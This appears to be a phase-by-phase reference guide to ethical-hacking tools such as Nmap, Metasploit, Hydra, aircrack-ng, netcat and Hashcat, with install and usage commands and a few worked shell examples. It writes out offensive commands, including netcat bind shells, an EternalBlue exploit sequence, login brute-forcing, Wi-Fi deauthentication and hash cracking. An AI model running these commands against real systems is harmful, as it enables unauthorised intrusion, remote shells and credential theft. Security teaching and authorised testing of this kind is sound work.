Comprehensive Ethical Hacking Tools Guide

This document provides a comprehensive guide on ethical hacking tools organized into phases, including reconnaissance, scanning, vulnerability scanning, traffic analysis, wireless attacks, and post-exploitation. Each tool is detailed with its purpose, installation instructions, basic and advanced usage. It serves as a reference for ethical hackers to efficiently conduct security assessments and penetration testing.

Ethical Hacking (E.H.) tools, fully explained:
Below is a from-scratch, end-to-end guide covering every tool we’ve discussed, organized into
logical phases of an ethical-hacking engagement. Each tool is broken down into:
1. What it is
2. When & why to use it
3. Installation
4. Core workflow / basic usage
5. Advanced tips & common flags
Use this as your living reference—bookmark or save it for future projects.

Phase 1: Reconnaissance & Information Gathering


1. Nmap
● What: TCP/UDP port scanner with service and OS fingerprinting.
● Why: To discover live hosts, open ports, running services and OS versions.
● Install
```bash
sudo apt update && sudo apt install nmap
```
● Basic
```bash
# Ping-scan a subnet, then a SYN scan with version and OS detection on one host
nmap -sn [Link]/24
sudo nmap -sS -sV -O [Link]
```
● Advanced
○ -p- scans all 65535 TCP ports, -T4 speeds up timing, -A adds default scripts, version and OS detection.
○ Output: -oA project-name writes normal, XML and grepable files in one go.
○ -sS and -O need raw sockets, so run those scans as root.
2. Masscan
● What: Ultra-fast, Internet-scale port scanner with its own userland TCP/IP stack.
● Why: When you need to sweep huge IP ranges quickly; follow up with Nmap for detail.
● Install
```bash
git clone [Link]
cd masscan && make && sudo make install
```
● Basic
```bash
sudo masscan [Link]/8 -p80,443 --rate=10000
```
● Advanced
○ Use --banner to grab service banners; because masscan bypasses the kernel stack, banner grabbing needs a spare source address (--source-ip) or a firewall rule so the kernel does not RST the connections.
○ Pipe live hosts to Nmap. masscan's list output is not a bare IP list:
```bash
masscan … -oL [Link]
```
○ Extract the IP column from that file first; nmap -iL [Link] -sV expects one host per line.
○ --rate is packets per second. 10000 can saturate small uplinks and trip IDS, so start lower on customer networks.
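The masscan-to-Nmap handoff above, as an added example that is not part of the original guide or of masscan itself. It assumes the default -oL "list" format (one record per line: state, protocol, port, IP, timestamp) and uses only awk, sort and paste. The list file in the block is constructed to look like masscan output; no scan is run, and the follow-up Nmap command is printed rather than executed.

```shell
# Added example (not from the page): masscan's -oL "list" output is not a bare
# host list, so `nmap -iL` cannot read it directly. These helpers extract the
# unique hosts and the union of open ports, ready for `nmap -iL` and `-p`.

# masscan_hosts <list-file> -> one unique IP per line
# Only "open" records are kept; "banner" records (from --banner) are skipped.
masscan_hosts() {
  awk '$1 == "open" { print $4 }' "$1" | sort -u
}

# masscan_ports <list-file> -> comma-separated, numerically sorted port list
masscan_ports() {
  awk '$1 == "open" { print $3 }' "$1" | sort -un | paste -sd, -
}

# nmap_followup <list-file> -> prints the nmap command line covering every host
# and port masscan found. -Pn skips host discovery: masscan already proved the
# hosts are up. Printed, not executed, in this demo.
nmap_followup() {
  hosts=$(mktemp)
  masscan_hosts "$1" > "$hosts"
  printf 'nmap -sV -Pn -p %s -iL %s -oA masscan-followup\n' \
    "$(masscan_ports "$1")" "$hosts"
}

# Constructed sample in masscan list format (not a real scan)
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
#masscan
open tcp 443 10.0.0.5 1700000000
open tcp 80 10.0.0.5 1700000000
banner tcp 80 10.0.0.5 1700000000 http.server Apache
open tcp 80 10.0.0.9 1700000001
open tcp 22 10.0.0.12 1700000002
# end
EOF

masscan_hosts "$SAMPLE"
masscan_ports "$SAMPLE"
nmap_followup "$SAMPLE"
```

Feeding the union of ports to a single nmap run is deliberate: it keeps one invocation per sweep, and the cost of probing a port that only one host had open is negligible compared with re-scanning everything.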

3. theHarvester
● What: OSINT tool that harvests e-mail addresses, subdomains and hosts from search engines and public APIs.
● Why: Map the target's external footprint (employee e-mails, hostnames) without touching its systems.
● Install
```bash
sudo apt install theharvester
```
● Basic
```bash
theHarvester -d [Link] -b google -l 200
```
● Advanced
○ Combine sources: -b bing,linkedin,github,pgp; several sources need API keys in the config file.
○ Export HTML: -f [Link]

Phase 2: Scanning & Enumeration


4. WhatWeb
● What: Website fingerprinting (CMS, web server, plugins, frameworks).
● Why: Quickly learn the technology stack before choosing scanners.
● Install
```bash
sudo apt install whatweb
```
● Basic
```bash
whatweb [Link]
```
● Advanced
○ -a 3 for aggressive mode (more requests, more plugins), --verbose for detail.
○ Scan multiple: whatweb -i [Link] with one URL per line.
5. enum4linux
● What: SMB enumeration wrapper around smbclient, rpcclient, nmblookup and net.
● Why: Enumerate Windows/Samba users, shares, groups and password policies, often over a null session.
● Install
```bash
sudo apt install enum4linux
```
● Basic
```bash
enum4linux -a [Link]
```
● Advanced
○ Flags: -U (users), -S (shares), -P (password policy), -G (groups), -r (RID cycling).
○ -o requests OS information, not an output file; enum4linux has no save flag, so redirect or tee its stdout to a file.
○ enum4linux-ng is the maintained rewrite with the same workflow and JSON/YAML output.
6. smbclient
● What: SMB/CIFS "FTP-like" client.
● Why: List, upload and download files on Windows or Samba shares.
● Install
```bash
sudo apt install smbclient
```
● Basic
```bash
smbclient -L //[Link] -N            # list shares with a null session (-N: no password prompt)
smbclient //[Link]/share -U user%pass
```
● Advanced
○ At the prompt: get [Link], put [Link]; toggle recurse and prompt off before mget for bulk downloads.
○ Use -m SMB2 (or SMB3) to force a protocol version when the server rejects NT1.
7. rpcclient
● What: Low-level client for Windows MS-RPC interfaces (SAMR, LSA and others).
● Why: Enumerate domains, users, groups and SIDs, often anonymously.
● Install
```bash
sudo apt install smbclient    # the Debian package that ships rpcclient
```
● Basic
```bash
rpcclient -U "" -N [Link]     # null session: empty user, no password prompt
rpcclient $> enumdomusers
rpcclient $> querydominfo
```
● Advanced
○ lookupsids, enumdomgroups, queryuser <rid>, lookupnames.
○ Chain commands non-interactively with -c "enumdomusers;enumdomgroups" for scripting.
8. SNMP Tools (snmpwalk, snmp-check)
● What: SNMP enumeration by walking the MIB tree.
● Why: Discover device info: system description, interfaces, ARP tables, routes, running processes.
● Install
```bash
sudo apt install snmp snmp-mibs-downloader snmpcheck
```
● Basic
```bash
snmpwalk -v2c -c public [Link]
snmp-check [Link] -c public
```
● Advanced
○ Target a specific OID: .[Link].[Link] for interfaces.
○ Try default communities: public, private; a community string is the only authentication in v1/v2c.
○ To see names instead of numeric OIDs, comment out the "mibs :" line in /etc/snmp/snmp.conf after installing snmp-mibs-downloader.
9. Gobuster
● What: Fast directory/file, DNS and vhost brute-forcer written in Go.
● Why: Discover hidden paths, subdomains or virtual hosts.
● Install
```bash
sudo apt install gobuster
```
● Basic
```bash
gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link]
gobuster dns -d [Link] -w [Link]
```
● Advanced
○ -t 50 threads, -x php,html to try extensions, -o [Link] to save, -k to ignore TLS errors.
○ Use DNS mode to find wildcard records or subdomain-takeover candidates.
10. dirb
● What: Classic web content scanner.
● Why: Quick directory/file discovery with the bundled lists; recursive by default.
● Install
```bash
sudo apt install dirb
```
● Basic
```bash
dirb [Link] /usr/share/wordlists/dirb/[Link]
```
● Advanced
○ -r turns recursion off (dirb recurses into found directories by default), -S silent mode, -o [Link] saves output, -X .php,.txt adds extensions.
11. Wfuzz
● What: Flexible HTTP fuzzer for paths, parameters, headers and POST bodies.
● Why: Deep fuzzing beyond simple wordlists, with filtering on status code, size, words and lines.
● Install
```bash
sudo apt install wfuzz
```
● Basic
```bash
# the URL must contain the literal FUZZ placeholder where payloads go
wfuzz -c -z file,/usr/share/wordlists/dirb/[Link] --hc 404 \
  [Link]
```
● Advanced
○ Fuzz parameters: ?id=FUZZ; hide responses with --hc (status), --hw (words) or --hl (lines).
○ Multiple placeholders: FUZZ and FUZ2Z, with one -z payload per placeholder.

Phase 3: Vulnerability Scanning & Exploitation


12. Nikto
● What: Web-server scanner for dangerous files, misconfigurations and outdated software.
● Why: Rapid baseline check for known issues; it is noisy, so not for stealth.
● Install
```bash
sudo apt install nikto
```
● Basic
```bash
nikto -h [Link]
```
● Advanced
○ -Tuning 123 restricts which check categories run, -ssl forces TLS, -output [Link] saves the report.
13. OWASP ZAP
● What: Free GUI/CLI web-app scanner and intercepting proxy.
● Why: Automated and manual testing in one suite.
● Install
```bash
sudo snap install zaproxy --classic
```
● Basic
○ Proxy your browser via localhost:8080 (import ZAP's root CA for HTTPS), Spider, then Active Scan.
● Advanced
○ Use scripts (JavaScript, Python, Zest); run headless in CI via the Docker image and its baseline/full-scan scripts.
14. Greenbone Vulnerability Manager (GVM/OpenVAS)
● What: Full-network vulnerability management with dashboards and reporting.
● Why: Scheduled, comprehensive scanning plus reporting.
● Install
```bash
sudo apt install gvm
sudo gvm-setup       # prints the generated admin password; the first feed sync takes a while
sudo gvm-start
```
● Basic
○ Web UI at [Link]: create targets, then tasks, and run them.
● Advanced
○ greenbone-feed-sync to update feeds; automate with gvm-cli over the GMP protocol.
15. Metasploit Framework
● What: Exploitation framework with modules for scanning, exploitation and post-exploitation.
● Why: To launch and manage exploits, payloads and sessions.
● Install
```bash
# On Kali it is pre-installed
sudo apt update && sudo apt install metasploit-framework
```
● Basic
```bash
msfconsole
search smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [Link]
set LHOST [Link]
run
```
● Advanced
○ Run check before run where the module supports it, and set PAYLOAD explicitly rather than relying on the default.
○ Workspaces to separate engagements, resource scripts (.rc) to replay setups, meterpreter post modules for loot and pivoting.
16. sqlmap
● What: Automated SQL-injection detection and exploitation, up to database takeover.
● Why: Rapidly confirm and exploit SQLi flaws found during manual testing.
● Install
```bash
sudo apt install sqlmap
```
● Basic
```bash
sqlmap -u "[Link]" --batch --dbs
```
● Advanced
○ --level/--risk widen the payload set; --cookie or -H pass session cookies and headers; -r replays a saved request; --tamper scripts help bypass WAFs.
○ --batch accepts every default answer, so review what it chose before running destructive options such as --os-shell.
17. WPScan
● What: WordPress vulnerability scanner.
● Why: Enumerate plugins, themes, users and known WordPress vulnerabilities.
● Install
```bash
sudo gem install wpscan
wpscan --update
```
● Basic
```bash
wpscan --url [Link] --enumerate u,p,tt
```
● Advanced
○ Password brute-force with --passwords, --plugins-detection aggressive, and --api-token so findings are matched against the WPScan vulnerability database (without it only versions are reported).
18. Hydra
● What: Parallelised network login cracker for many protocols.
● Why: Brute-force SSH, FTP, HTTP forms, SMB, RDP and more.
● Install
```bash
sudo apt install hydra
```
● Basic
```bash
hydra -L [Link] -P [Link] ssh://[Link]
```
● Advanced
○ Form-based: the host comes before the module name, and the module argument is path:POST-body:failure-string (F= marks a failure string, S= a success string).
```bash
hydra -L [Link] -P [Link] target http-post-form \
  "/[Link]:uname=^USER^&pass=^PASS^:F=Invalid"
```
○ Throttle with -t (parallel tasks) on SSH, which lockouts and rate limits punish quickly; -s sets a non-default port.

Phase 4: Traffic Analysis & Man-in-the-Middle


19. Wireshark
● What: GUI packet sniffer and protocol analyser.
● Why: Deep inspection of live traffic or saved captures; decodes hundreds of protocols.
● Install
```bash
sudo apt install wireshark
```
○ Answer yes to non-root capture during install (dpkg-reconfigure wireshark-common) and add your user to the wireshark group instead of running the GUI as root.
● Basic
○ Select the interface, hit "Start", then apply display filters such as http or [Link]==80.
● Advanced
○ Colouring rules, custom dissectors, Follow TCP Stream, export objects, and Statistics → Conversations for flow summaries.
20. tcpdump
● What: CLI packet sniffer.
● Why: Quick captures and filtering from a shell, including on hosts without a GUI.
● Install
```bash
sudo apt install tcpdump
```
● Basic
```bash
# options first (including -w for the output file), then the capture filter
sudo tcpdump -i eth0 -nn -w [Link] tcp port 80
```
● Advanced
○ BPF filters: host [Link] and port 22; read a saved PCAP with -r [Link]; -nn avoids slow name lookups; -s 0 keeps whole packets.
21. Ettercap
● What: LAN-scale MITM suite (ARP spoofing, DNS spoofing, traffic filters).
● Why: Intercept and manipulate traffic on a local segment.
● Install
```bash
sudo apt install ettercap-graphical
```
● Basic
```bash
sudo ettercap -G
```
– select the interface, scan for hosts, pick targets, then MITM → ARP poisoning.
● Advanced
○ Filters: write rules in a .filter file, compile them with etterfilter, and load the compiled filter with -F to rewrite traffic on the fly.
○ ARP poisoning disrupts the segment if ettercap exits without re-ARPing, so keep it scoped and time-boxed.
22. mitmproxy
● What: TLS-capable HTTP(S) intercepting proxy with a console UI and Python scripting.
● Why: Inspect and modify web API calls or mobile-app traffic.
● Install
```bash
sudo apt install mitmproxy
```
● Basic
```bash
mitmproxy --mode regular --listen-port 8080
```
○ Point the client at the proxy and install the mitmproxy CA (served at mitm.it while proxied), otherwise TLS interception fails; apps that pin certificates need the pin removed first.
● Advanced
○ Write Python addons to automate response tampering; mitmdump runs them headless; saved flows can be replayed.

Phase 5: Wireless Attacks


23. aircrack-ng
● What: Suite for 802.11 monitoring, packet capture, injection and key cracking.
● Why: Audit WPA/WPA2-PSK networks.
● Install
```bash
sudo apt install aircrack-ng
```
● Basic
```bash
sudo airmon-ng start wlan0      # creates a monitor interface, typically wlan0mon
sudo airodump-ng wlan0mon       # find the AP; then lock on with -c/--bssid and -w to write a capture
# once a 4-way handshake is captured:
aircrack-ng -w [Link] [Link]
```
● Advanced
○ Deauth: aireplay-ng --deauth 10 -a <BSSID> wlan0mon forces clients to reconnect and produce a handshake.
○ airmon-ng check kill stops NetworkManager/wpa_supplicant from fighting over the adapter.
24. Reaver
● What: WPS PIN brute-forcer.
● Why: Recover a WPA/WPA2 passphrase through the WPS external-registrar weakness.
● Install
```bash
sudo apt install reaver
```
● Basic
```bash
sudo reaver -i wlan0mon -b <AP-BSSID> -vv
```
● Advanced
○ -c <channel> pins the channel; -K 1 runs the offline Pixie Dust attack; reaver pauses on WPS lockout by default, and -L ignores that state (at the risk of locking the AP for longer).
25. Wifite
● What: Automated wireless auditing tool wrapping aircrack-ng, reaver and related tools.
● Why: Simplifies attacking multiple APs in sequence.
● Install
```bash
sudo apt install wifite
```
● Basic
```bash
sudo wifite
```
● Advanced
○ Adjust timeouts, select specific BSSIDs or channels, save handshakes automatically for later cracking.
26. Kismet
● What: Wireless network detector, sniffer and IDS.
● Why: Passive discovery of networks, clients and hidden SSIDs without transmitting.
● Install
```bash
sudo apt install kismet
```
● Basic
```bash
sudo kismet
```
– configure a capture source, open the web UI, start logging.
● Advanced
○ Plugins for GPS mapping, aggregated alerts, export to other tools.

Phase 6: Post-Exploitation & Pivoting


27. Netcat ("nc")
● What: Versatile TCP/UDP connection tool for tunnels, file transfer and ad-hoc shells.
● Why: Quick bind/reverse shells, port forwarding, banner grabbing.
● Install
```bash
sudo apt install netcat-traditional   # the OpenBSD variant (netcat-openbsd) has no -e
```
● Basic
```bash
# Bind shell on the target (needs netcat-traditional; the binary may be nc.traditional on Debian)
nc -lvnp 4444 -e /bin/bash
# Connect from the attacker
nc target 4444
```
● Advanced
○ UDP mode: -u; -z scans ports without sending data.
○ Bind shell without -e (works with netcat-openbsd): mkfifo /tmp/f; nc -l 1234 0</tmp/f | /bin/sh >/tmp/f
○ An unauthenticated bind shell is reachable by anyone on the network; prefer a reverse shell to your own listener and remove it when done.
28. sshuttle
● What: "Poor man's VPN": routes TCP (and optionally DNS) for chosen subnets over SSH.
● Why: Reach internal networks through an SSH bastion without a full VPN.
● Install
```bash
sudo apt install sshuttle
```
● Basic
```bash
sshuttle -r user@bastion [Link]/8
```
● Advanced
○ --dns tunnels DNS lookups too, -D daemonises; UDP (other than DNS) and ICMP are not carried.
29. LinPEAS
● What: Local Linux privilege-escalation enumeration script.
● Why: Automate discovery of SUID binaries, writable paths, cron jobs, kernel version and credentials left in files.
● Install/Use
```bash
wget [Link]
chmod +x [Link]
./[Link]
```
● Advanced
○ Findings are colour-coded; grep the saved output for "Potential" lines, and redirect to a file for offline review (-a runs every check, slower and noisier).
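The SUID check that LinPEAS (and manual enumeration) starts with, as an added example that is not LinPEAS code or part of the original guide. It assumes a POSIX shell with find and a writable temp directory; the abusable-binary list is a constructed, abbreviated stand-in for GTFOBins, and the constructed setuid file in a temp directory stands in for a target host so the block runs offline.

```shell
# Added example (not linpeas): list setuid/setgid files under a directory, then
# flag the ones whose name is on a short list of binaries that are dangerous
# when setuid. GTFO_LIST is constructed and abbreviated; GTFOBins is the real
# reference. A temp directory with a setuid file stands in for a target host.

# Constructed, abbreviated list of binaries that should not be setuid
GTFO_LIST="find vim nmap python python3 bash env perl less more awk cp mv tee"

# suid_scan <dir> -> one path per line for every setuid or setgid regular file
suid_scan() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# flag_gtfo (paths on stdin) -> "CHECK <path>" when the basename is on GTFO_LIST,
# "info  <path>" otherwise, so the interesting hits stand out in a long list
flag_gtfo() {
  while IFS= read -r path; do
    name=${path##*/}
    hit=no
    for g in $GTFO_LIST; do
      if [ "$name" = "$g" ]; then hit=yes; break; fi
    done
    if [ "$hit" = yes ]; then
      printf 'CHECK %s\n' "$path"
    else
      printf 'info  %s\n' "$path"
    fi
  done
}

# Demo on a constructed tree: a setuid script named "find" that must be
# flagged, and an ordinary file that must not be reported at all.
DEMO_DIR=$(mktemp -d)
printf '#!/bin/sh\nexit 0\n' > "$DEMO_DIR/find"
chmod u+s "$DEMO_DIR/find"
printf '#!/bin/sh\nexit 0\n' > "$DEMO_DIR/ordinary"
suid_scan "$DEMO_DIR" | flag_gtfo
```

On a real host run suid_scan / against the whole filesystem and compare the CHECK lines with the distribution's expected setuid set (passwd, sudo, mount and the like are normal); anything else, and in particular anything in /tmp, /home or /opt, is the lead to chase.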

Phase 7: Password Cracking


30. John the Ripper
● What: Classic CPU-based password cracker with hash-format auto-detection.
● Why: Quick dictionary and incremental attacks on hashes, including /etc/shadow and archive or key files converted with its *2john helpers.
● Install
```bash
sudo apt install john
```
● Basic
```bash
john --wordlist=/usr/share/wordlists/[Link] [Link]
```
● Advanced
○ Use --rules to mangle wordlist entries, incremental mode for brute force, --format to pin the hash type, and --show to print what was cracked.
31. Hashcat
● What: GPU-accelerated cracker supporting hundreds of hash formats.
● Why: High-speed attacks on complex or slow hashes.
● Install
```bash
sudo apt install hashcat
```
● Basic
```bash
hashcat -m 0 -a 0 [Link] [Link]     # -m 0 is raw MD5; -a 0 is straight dictionary mode
```
● Advanced
○ Attack modes: -a 1 (combinator), -a 3 (mask), -a 6/7 (hybrid wordlist+mask / mask+wordlist).
○ -r with a rule file (for example best64.rule from hashcat's rules directory) mangles wordlist entries; --show prints cracked hashes; --status and --restore track and resume long sessions.
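What "wordlist plus rules" means in practice for both John (--rules) and Hashcat (-a 0 -r), as an added example that is not code from either project or from the original guide: a miniature dictionary attack in plain sh, plus a hash-shape guesser that returns the matching hashcat -m mode. It assumes only coreutils (md5sum, sha256sum, cut, tr); the wordlist and target hashes are constructed for the demo, and the rule set is a hypothetical five-suffix stand-in for a real rule file.

```shell
# Added example (not john or hashcat code): a tiny dictionary + rule attack to
# show what `john --wordlist --rules` and `hashcat -a 0 -r <rules>` do, and a
# hash-shape guesser for the hashcat -m number. Wordlist and targets below are
# constructed for the demo.

# hash_mode <hash> -> hashcat mode number guessed from the hash's shape.
# Shape alone is ambiguous (32 hex chars is also NTLM, mode 1000), so treat the
# answer as a first guess and confirm from where the hash came from.
hash_mode() {
  h=$1
  case "$h" in
    '$1$'*)                    echo 500 ;;    # md5crypt
    '$5$'*)                    echo 7400 ;;   # sha256crypt
    '$6$'*)                    echo 1800 ;;   # sha512crypt
    '$2a$'*|'$2b$'*|'$2y$'*)   echo 3200 ;;   # bcrypt
    *)
      case "${#h}" in
        32) echo 0 ;;        # raw MD5
        40) echo 100 ;;      # raw SHA-1
        64) echo 1400 ;;     # raw SHA-256
        *)  echo unknown ;;
      esac ;;
  esac
}

# digest <md5|sha256> <string> -> hex digest of the string (no newline hashed)
digest() {
  printf '%s' "$2" | "${1}sum" | cut -d' ' -f1
}

# apply_rules <word> -> candidates: the word and its capitalised form, each
# alone and with common suffixes. A hypothetical stand-in for a rule file.
apply_rules() {
  w=$1
  first=$(printf '%s' "$w" | cut -c1 | tr '[:lower:]' '[:upper:]')
  cap="${first}${w#?}"
  for base in "$w" "$cap"; do
    printf '%s\n' "$base" "${base}1" "${base}123" "${base}!" "${base}2024"
  done
}

# crack <md5|sha256> <target-hash> <wordlist> -> prints the matching password;
# exit status 1 when the wordlist and rules do not cover it
crack() {
  algo=$1; target=$2; wordlist=$3
  found=$(
    while IFS= read -r word || [ -n "$word" ]; do
      apply_rules "$word"
    done < "$wordlist" |
    while IFS= read -r cand; do
      if [ "$(digest "$algo" "$cand")" = "$target" ]; then
        printf '%s\n' "$cand"
        break
      fi
    done
  )
  [ -n "$found" ] && printf '%s\n' "$found"
}

# Constructed wordlist and targets
WORDLIST=$(mktemp)
printf 'letmein\nwinter\npassword\n' > "$WORDLIST"
MD5_TARGET=5f4dcc3b5aa765d61d8327deb882cf99      # MD5("password")
SHA256_TARGET=$(digest sha256 'Winter2024')       # built here so the demo checks itself

echo "suggested mode for $MD5_TARGET: -m $(hash_mode "$MD5_TARGET")"
crack md5 "$MD5_TARGET" "$WORDLIST"
crack sha256 "$SHA256_TARGET" "$WORDLIST"
```

Three words become thirty candidates with just five rules; real rule files like best64 multiply a wordlist by dozens, which is why rules usually beat a longer plain list. The real tools compute the same digests on a GPU and compare against many targets at once rather than one hash per call.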

Phase 8: Reverse Engineering & Static Analysis


32. radare2
● What: CLI reverse-engineering framework and disassembler.
● Why: Inspect functions, patch binaries, automate analyses.
● Install
```bash
sudo apt install radare2
```
● Basic
```bash
r2 binary
[0x004000]> aa          # analyze all
[0x004000]> afl         # list functions
[0x004000]> pdf @ main  # print the disassembly of main
```
● Advanced
○ Visual mode: V; patching needs the file opened writable (r2 -w), then s addr; wx …; scripting via .r2 files or r2pipe.
○ pdf disassembles; for C-like output use pdc, or the r2ghidra plugin (pdg) for a real decompiler.
33. Ghidra
● What: GUI reverse-engineering suite with a C-style decompiler.
● Why: Quickly get high-level pseudocode; collaborative analysis through a shared Ghidra Server.
● Install
1. Download the release ZIP from [Link] and unzip it (a supported JDK is required).
2. ./ghidraRun to start.
● Basic
○ New project → import binary → run auto-analysis → browse the Listing and Decompiler windows.
● Advanced
○ Write Java/Python scripts in the Script Manager; use the Function ID database to identify library calls.
34. apktool
● What: Android APK reverse engineering: decode and rebuild resources, the manifest and smali.
● Why: Inspect or modify app resources, the manifest, or code.
● Install
```bash
sudo wget [Link] -O /usr/local/bin/[Link]
printf '#!/usr/bin/env bash\nexec java -jar /usr/local/bin/[Link] "$@"\n' | sudo tee /usr/local/bin/apktool
sudo chmod +x /usr/local/bin/apktool
```
● Basic
```bash
apktool d [Link] -o app_src
# edit res/, smali/
apktool b app_src -o [Link]
jarsigner -keystore [Link] [Link] alias
```
● Advanced
○ apktool if [Link] installs a vendor framework for apps that depend on one; use a smali-aware editor for precise bytecode patching.
○ jarsigner only produces a v1 signature; recent Android versions expect v2 or later, so sign rebuilt APKs with apksigner from the SDK build-tools (zipalign first).
35. Burp Suite Community Edition
● What: Web-security proxy and manual testing toolkit (Proxy, Repeater, Decoder, Intruder).
● Why: Intercept and modify HTTP(S); manually probe parameter tampering and logic flaws.
● Install
1. Download from [Link] → java -jar burpsuite_community.jar
● Basic
○ Proxy the browser on [Link]:8080 → capture requests → send to Repeater for manual fuzzing.
● Advanced
○ Use BApp Store extensions (e.g. SAML Raider), configure session-handling rules, Intruder for small brute-forces (rate-limited in Community).

Putting It All Together: Sample Workflow


1. Footprint the target with theHarvester and WhatWeb.
2. Discover hosts and ports using masscan → Nmap.
3. Enumerate services: SMB (enum4linux, smbclient, rpcclient), SNMP (snmpwalk), web directories (Gobuster/dirb/wfuzz).
4. Scan for vulnerabilities with Nikto, GVM, WPScan, sqlmap.
5. Exploit via Metasploit, Hydra, or manual Burp/ZAP attacks.
6. Capture traffic with Wireshark/tcpdump; perform MITM with Ettercap/mitmproxy where it is in scope.
7. Audit wireless using aircrack-ng, Reaver, Wifite, Kismet.
8. Post-exploit: get a shell (Netcat), pivot (sshuttle), enumerate for escalation (LinPEAS).
9. Crack any hashes found with John or Hashcat.
10. Reverse-engineer binaries with radare2, Ghidra, apktool for deeper insight.
Keep this guide at hand as your reference; each tool's section is self-contained for quick lookups. Happy hacking (ethically, of course)!
